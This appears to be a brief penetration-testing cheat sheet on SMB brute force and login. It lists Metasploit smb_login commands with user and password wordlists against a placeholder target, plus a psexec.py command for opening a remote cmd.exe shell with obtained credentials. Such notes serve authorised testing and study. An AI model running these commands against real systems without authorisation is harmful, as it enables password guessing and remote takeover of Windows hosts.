Brute force and Login
Brute force with metasploit
use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
runAuthentication with psExec.py
psexec.py username@ip address cmd.exeAuthentication with metasploit Psexec module
Last updated